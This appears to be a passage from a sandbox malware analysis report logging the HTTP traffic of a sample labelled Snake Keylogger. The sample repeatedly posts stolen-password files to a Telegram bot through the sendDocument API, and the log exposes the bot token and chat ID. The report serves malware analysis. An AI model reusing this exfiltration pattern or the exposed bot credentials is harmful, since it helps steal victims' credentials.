                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:02 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:02 UTC95INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66806,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228782,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            57192.168.2.549852149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:02 UTC96OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e2e41b12
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:02 UTC96OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 65 34 31 62 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e2e41b12Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:03 UTC97INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:03 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:03 UTC97INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66807,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228783,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            58192.168.2.549857149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:03 UTC97OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e329424c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:03 UTC98OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 32 39 34 32 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e329424cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:03 UTC98INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:03 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:03 UTC99INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66809,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228783,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            59192.168.2.549859149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:03 UTC99OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e3673d16
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:03 UTC99OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 36 37 33 64 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e3673d16Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:04 UTC100INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:04 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:04 UTC100INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66810,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228784,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.549774149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:40 UTC10OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d5b1ba0c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:40 UTC10OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 62 31 62 61 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d5b1ba0cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:41 UTC10INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:41 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:41 UTC11INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66752,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228760,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            60192.168.2.549863149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:04 UTC101OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e3a9ffd1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:04 UTC101OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 61 39 66 66 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e3a9ffd1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:04 UTC102INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:04 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:04 UTC102INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66811,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228784,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            61192.168.2.549865149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:04 UTC103OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e3e7fb9c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:04 UTC103OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 65 37 66 62 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e3e7fb9cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:05 UTC103INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:05 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:05 UTC104INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66813,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228784,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            62192.168.2.549868149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:05 UTC104OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e43b6d80
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:05 UTC105OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 33 62 36 64 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e43b6d80Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:05 UTC105INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:05 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
